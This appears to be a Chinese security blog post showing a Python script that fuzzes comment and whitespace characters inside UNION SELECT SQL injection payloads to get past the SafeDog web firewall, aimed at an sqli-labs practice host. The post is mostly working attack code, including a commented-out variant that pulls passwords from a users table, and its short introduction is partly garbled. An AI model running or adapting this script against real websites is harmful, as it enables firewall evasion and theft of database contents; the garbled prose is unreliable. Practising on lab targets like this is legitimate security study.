fuzz方法注入绕过安全狗

  • 内容
  • 相关

以sqli lab 第六关为享受一旁 

竣bypass

 诂训里的payload

能够竣跑出带表名列名的事请

#encoding = utf8
import requests
from queue import Queue
import threading

fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00']
fuzz_sz = ['',' ']
fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"]
Fuzz=fuzz_ch+fuzz_sz+fuzz_zs
class fuzz:
    def __init__(self,root,ThreadNum=5):
        self.root="http://192.168.1.109/sqli/Less-5/?id=1"
        self.ThreadNum=5
        self.headers = {
             'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) 

AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20',
             'Referer': 'http://www.camel.com',
             'Cookie': 'whoami=digo8',
             }
        self.task =Queue()
        for a in Fuzz:
            for b in Fuzz:
                for c in Fuzz:
                    for d in Fuzz:
                        exp=self.root+"' /*!union"+a+b+c+d+"select*/"+" 1,2,3 --+"
                        '''exp=self.root+"' /*!union"+a+b+c+d+"select*/"+" 1,2,password 

/*!from "+a+b+c+d+"users*/--+"'''
                        self.task.put(exp)
        self.s_list = []
    
    def visit(self,url):
        try:
            r = requests.get(url,headers=self.headers)
            ret=r.text
        except:
            print ("Fail to connect...")
            ret=""
        return ret

    def test_url(self):
        while not self.task.empty():
            url = self.task.get()
            ret = self.visit(url)
            if "Dhakkan" in ret and not "error" in ret :
                self.s_list.append(url)
                print (url)
    
    def work(self):
        threads = []
        for i in range(self.ThreadNum):
            t = threading.Thread(target=self.test_url())
            threads.append(t)
            t.start()
        for t in threads:
            t.join()
obj=fuzz("http://192.168.1.109/sqli/Less-5/?id=1")
obj.work()

本文标签:

版权声明:若无特殊注明,本文皆为《花落》原创,转载请保留文章出处。

本文链接:fuzz方法注入绕过安全狗 - http://www.9bwl.com/post-150.html

收录状态: [百度已收录√]  [360未收录×]  [搜狗已收录√]

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

sitemap
00:00 / 00:00
顺序播放